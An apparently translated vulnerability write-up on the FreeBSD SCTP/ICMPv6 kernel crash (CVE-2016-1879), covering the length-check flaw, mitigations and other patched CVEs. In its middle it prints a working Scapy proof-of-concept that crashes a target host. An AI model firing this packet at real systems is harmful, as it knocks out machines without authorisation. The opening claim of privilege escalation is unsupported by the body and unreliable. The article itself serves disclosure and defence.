Use of FreeBSD Remote DoS attack analysis (CVE-2016-1879)

Use of FreeBSD Remote DoS attack analysis (CVE-2016-1879)

 

FreeBSD team announced a serious vulnerability in their operating systems. Hackers can exploit this vulnerability to launch DoS attacks, escalate privileges or steal sensitive system information.

SCTP ICMPv6 error Manipulation Vulnerability (CVE-2016-1879)

SCTP is a transport layer protocol that can be used to transmit signals in an IP address environment. Generally, mobile operators use this protocol in technical networks.

This vulnerability affects several versions of FreeBSD system (9.3, 10.1, 10.2). If they support SCTP and IPV6, it will be tricky (this is actually the default configuration of the system ). Hackers need to send a specially crafted ICMPv6 message to exploit this vulnerability. If the vulnerability is exploited successfully, DoS attacks can be performed on the system.

DoS attacks are caused by system error messages from ICMPv6, and the length of the SCTP header is not carefully checked. If the target receiver does not exist, the route generates an error message and sends it to the sender through ICMPv6.

This ICMPv6 includes the original IPv6 package. The Next Header area shows how SCTP is encapsulated:

 

 

When the system kernel receives an error message sent through ICMPv6, it transfers the upper-layer protocol package to the necessary parser sctp6_ctlinput. The SCTP parser mistakenly identifies the input header as a valid length and then tries to copy it with m_copydata (), which contains the offset value and byte value. Originally, the system expected the message header length to be 12 bytes, but the hacker may have sent it an 11-byte header. Finally, the reference of a null pointer caused the kernel to crash.

Vulnerability exploitation code

To exploit this vulnerability, we do not need to open SCTP sockets. The magic Scapy will help us to create the ICMPv6 data packet needed for exploits (here the editor code is indented as follows, please adjust it as needed ):

#!/usr/bin/env python# -*- coding: utf-8 -*- import argparsefrom scapy.all import *  def get_args():    parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78)    parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address")    parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address")    parser.add_argument("-I", "--iface", type=str, help="Iface")    options = parser.parse_args()     if options.dst_mac is None or options.dst_ipv6 is None:        parser.print_help()        exit()     return options  if __name__ == '__main__':    options = get_args()     sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() / IPv6(nh=132,                                                                                               src=options.dst_ipv6,                                                                                               dst='fe80::230:56ff:fea6:648c'),          iface=options.iface)

The following is an attack demonstration video:

Repair and Security suggestions

To protect your system from this vulnerability, we recommend that you do this:

Disable IPv6 if you do not need it. Disable ICMPv6 or IPv6 traffic on the firewall. If not, disable the system kernel's support for the SCTP stack (you need to re-compile the kernel ).

You can use the vendor'sPatchTo install additional verification for SCTP ICMPv6 messages. You need to re-compile the kernel here.

Other vulnerabilities

In addition, FreeBSD system has encountered other serious vulnerabilities, and official developers have released patches for them.

1. If the system enables TCP_MD5SIG and TCP_NOOPT, hackers can perform DoS attacks on the system through TCP connections. They only need a listening socket enabled by TCP_NOOPT to exploit this vulnerability (CVE-2016-1882 patch ).

2. Linux Robust Futex error, will cause system memory data leakage (CVE-2016-1880 patch ).

3. Insecure Default Configuration, causing hackers to access the daemon configuration file/etc/bsnmpd. conf (CVE-2015-5677 patch ).

To protect your system from vulnerabilities, we strongly recommend that you use the IPv6 address after security configuration and install corresponding security tools to protect the system security.